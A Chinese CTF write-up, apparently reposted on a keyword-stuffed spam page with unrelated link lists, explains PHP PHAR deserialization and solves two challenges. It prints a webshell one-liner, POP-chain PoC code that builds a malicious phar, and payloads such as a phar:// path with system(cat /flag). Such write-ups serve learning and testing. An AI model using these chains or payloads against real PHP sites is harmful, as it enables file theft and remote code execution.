当前位置: 首页 > news >正文

有域名了也备案了怎么做网站网络热词排行榜

有域名了也备案了怎么做网站,网络热词排行榜,做网站推广的难点、,域名有没有被注册哪个网站最好PHAR PHAR#xff08;PHP Archive#xff09;文件是一种归档文件格式#xff0c;phar文件本质上是一种压缩文件#xff0c;会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时#xff0c;会自动反序列化meta-data内的内容,这里就是我们反序…PHAR PHARPHP Archive文件是一种归档文件格式phar文件本质上是一种压缩文件会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时会自动反序列化meta-data内的内容,这里就是我们反序列化漏洞的利用点 phar文件的结构 1.a stub可以理解为一个标志格式为xxx?php xxx; __HALT_COMPILER();?前面内容不限但必须以__HALT_COMPILER();来结尾否则phar扩展将无法识别这个文件为phar文件 2.a manifest describing the contentsphar文件本质上是一种压缩文件其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data这是上述攻击手法最核心的地方 3.the file contents 被压缩文件的内容 4.[optional] a signature for verifying Phar integrity (phar file format only)签名放在文件末尾将生成的phar文件上传成功后使用phar协议读取文件在使用phar伪协议解析时php一大部分的文件系统函数(下图中的函数)都会将meta-data进行反序列化 phar反序列化利用的条件 phar文件要能够上传到服务器端。要有可用的魔术方法作为“跳板”。文件操作函数的参数可控且:、/、phar等特殊字符没有被过滤 [SWPUCTF 2021 新生赛]babyunser 存在文件上传先上传一个一句话木马看看 发现会被解析为txt文件那么先找找源码看看利用查看文件的功能看看 index.php html titleaa的文件管理器/title body h1aa的文件管理器/h1 a hrefupload.php上传文件/a br br a hrefread.php查看文件/a /body /html upload.php html titleaa的文件上传器/title bodyform action enctypemultipart/form-data methodpostp请选择要上传的文件pinput classinput_file typefile nameupload_file/input classbutton typesubmit namesubmit value上传//form /body /html?phpif(isset($_POST[submit])){$upload_pathupload/.md5(time())..txt;$temp_file $_FILES[upload_file][tmp_name];if (move_uploaded_file($temp_file, $upload_path)) {echo 文件路径.$upload_path;} else {$msg 上传失败;}}read.php ?php include(class.php); $anew aa(); ? ?php error_reporting(0); $filename$_POST[file]; if(!isset($filename)){die(); } $filenew zz($filename); $contents$file-getFile(); ?class.php ?php class aa{public $name;public function __construct(){$this-nameaa;}public function __destruct(){$this-namestrtolower($this-name);} }class ff{private $content;public $func;public function __construct(){$this-content\?php eval(\$_POST[1]);?;}public function __get($key){$this-$key-{$this-func}($_POST[cmd]);} }class zz{public $filename;public $contentsurprise;public function __construct($filename){$this-filename$filename;}public function filter(){if(preg_match(/^\/|php:|data|zip|\.\.\//i,$this-filename)){die(这不合理);}}public function write($var){$filename$this-filename;$lt$this-filename-$var;//此功能废弃不想写了}public function getFile(){$this-filter();$contentsfile_get_contents($this-filename);if(!empty($contents)){return $contents;}else{die(404 not found);}}public function __toString(){$this-{$_POST[method]}($_POST[var]);return $this-content;} }class xx{public $name;public $arg;public function __construct(){$this-nameeval;$this-argphpinfo();;}public function __call($name,$arg){$name($arg[0]);} } 明显存在php反序列化 ,构造poc后生成phar文件将phar文件上传之后再通过post来cat flag ?php class aa{public $name;function __construct(){$this-name new zz();} }class ff{private $content;public $func assert;function __construct(){$this-content new xx();} }class zz{public $filename;public $contentsurprise;function __construct(){$this-filename new ff();}}class xx{public $name;public $arg; }$a new aa(); echo urlencode(serialize($a));# 下面这部分就没改 $phar new Phar(phar.phar); $phar-startBuffering(); $phar-setStub(?php __HALT_COMPILER(); ?); //设置stub$phar-setMetadata($a); //将自定义的meta-data存入manifest $phar-addFromString(test.txt, test); //添加要压缩的文件 //签名自动计算 $phar-stopBuffering(); 生成phar的部分可以直接套用 payload filephar://upload/a5251443346d8ea6c85877d7ef036536.txtmethodwritevarcontentcmdsystem(cat /flag) [SWPU 2018]SimplePHP 查看源码提示flag的位置在flag.php 还存在查看文件的模块看看能不能利用来查看源码 file.php class.php序列化的代码但是给了phar协议的提示 大概率是phar反序列化function.php主要就是限制上传文件的后缀 整理一下思路已知flag在flag.php中但是没有办法直接访问flag.php因为在file.php中限制了只能访问var/www/html下的文件再看序列化的代码不存在unserialize怎么进行反序列化通过phar文件自动触发反序列化通过文件上传触发序列化之后利用file_get_contents来读取flag.php 开始构造pop链 链尾毫无疑问是Test::file_get(),file_get在get中被调用所以触发get就能调用file_get从get开始倒推到链头 _get访问不存在的变量时触发Show::_toString,source是不存在的变量无法调用 在C1e4r中echo可以触发_toStringdestruct在变量摧毁时会自动触发所以就形成完整的pop链C1e4r::_destruct-Show::_toString-Test::file_get() poc $snew Show; $t-params[source]/var/www/html/flag.php; $tnew Test; $s-str[str]$t; $cnew C1e4r; $c-str$s;生成phar文件上传后进入 upload页面拿到文件路径 用phar伪协议读取 ?filephar://upload/643dfaadf749736256e05de9e40b864b.jpg 最后进行base64解码拿到flag
http://www.hkea.cn/news/14338726/

相关文章:

  • 手机网站自适应分辨率wordpress 备份主题
  • 宁波制作网站企业有哪些可以做微课PPT模板 网站
  • 湖州集团网站建设达州建设机械网站
  • php网站开发实例视频教程大专毕业设计怎么做
  • 深圳官方网站泰安房产最新网签情况
  • 做网站的天空网嘉兴丝绸大厦做网站的公司
  • 郑州做网站要多少钱个人网页免费域名注册入口
  • 纯html网站开发工具深圳网站建设 合作品牌
  • php网站开发环境一威海市网站建设
  • 母婴网站的功能设计招商网站开发
  • 建美食网站有哪些原因wordpress默认安装目录
  • php怎么创建网站什么是门户网站
  • 网站模板 免费下载杭州品牌网站设计制作公司
  • 学习网站建设论文阿里云做网站可以吗
  • 直播平台创建公会佛山网站建设乐云seo在线制作
  • 怎么做php网站深圳做网站建设和维护专员管理层
  • 潍坊seo建站谷歌优化技术
  • 企业管理的官方网站有哪些流感用什么药最好
  • 专做民宿预定的网站大兴模版网站开发公司哪家好
  • 您的网站对百度设置了ua封禁z怎么解决wordpress自动轮播图插件
  • 麻城网站建设公司虚拟商城平台
  • 网络推广网站套餐付网站建设费用会计分录
  • 展示型网站都包括什么模块专业模板网站设计公司
  • 网站建设登录页面怎么写wordpress菜单用处
  • 珠海市网站建设哪家好wordpress启动广告
  • 做网站的软件项目进度计划互联网营销渠道有哪些
  • 餐饮品牌设计网站建设男孩子怎么做网站
  • 江苏省 建设 注册中心网站wordpress seo优化插件
  • 只买域名不建网站网络科技公司有什么职位
  • wordpress中有趣的插件太原关键词优化服务